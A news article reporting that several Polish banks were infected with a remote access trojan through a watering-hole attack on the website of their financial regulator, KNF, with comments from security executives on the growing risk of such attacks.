It is not yet known what was stolen as the exfiltrating traffic was encrypted
It is not yet known what was stolen as the exfiltrating traffic was encrypted

Polish banks have reportedly been infected with malware from a Polish financial regulator. Several unnamed banks were infected by as yet unknown viruses from the Polish Financial Supervision Authority (KNF), which ironically enough oversees the information security of Polish banks.

Several banks had complained of attacks over the week of 30 January, noticing suspicious files and encrypted traffic flowing through their networks and to strange IPs. Further investigation revealed malware on servers and workstations. Further investigation led the banks down to the source which, strangely enough, was their own regulator.

Attackers had apparently started using the website as a watering hole website. Attackers had altered a Javascript file on the website, so that when users visited, an iframe would download a file onto their computers which when executed would load a Remote Access Trojan (RAT). While banks have apparently reassured customers that they have not yet detected any unauthorised transactions, they do not yet know what exactly was stolen as the outgoing traffic was encrypted.

Ilia Kolochenko, CEO of High-Tech Bridge told SC Media UK that we should be expecting attackers to get more crafty as we get more vigilant, “In the past, hackers used one-off or garbage websites to host malware, but as corporate users become more educated and vigilant, attackers need to find more reliable avenues to deliver malware and enter corporate networks.”

“That's why Gartner, and other independent research companies, continuously say that the risk of corporate web applications is very high and seriously underestimated. Spear-phishing and watering hole attacks against high-profile websites will significantly grow in the near future."

There has been little news on the nature of the attackers but KNF's website, which banks visit regularly, seems like a golden opportunity for a cyber-criminal group looking to exploit banks. David Jones, global head of payments and banking at Irdeto explained to SC, “As banking systems become more connected or share common access points (such as a regulatory body), it is important to recognise that standard network protocols are inadequate to prevent advanced cyber-attacks. Web apps/APIs and Javascript can be tampered with and their data intersected. This is due to the environment supported by modern browsers and the inherent lack of security in the open internet.

The KNF released a statement to press, saying that though the website was infected, KNF systems themselves are safe and “the work of the office run(s) unimpeded”.

The regulator's website has currently been shut down and been made inaccessible by the administrator. The event has been reported to Polish CERT.

KNF did not respond to requests for comment.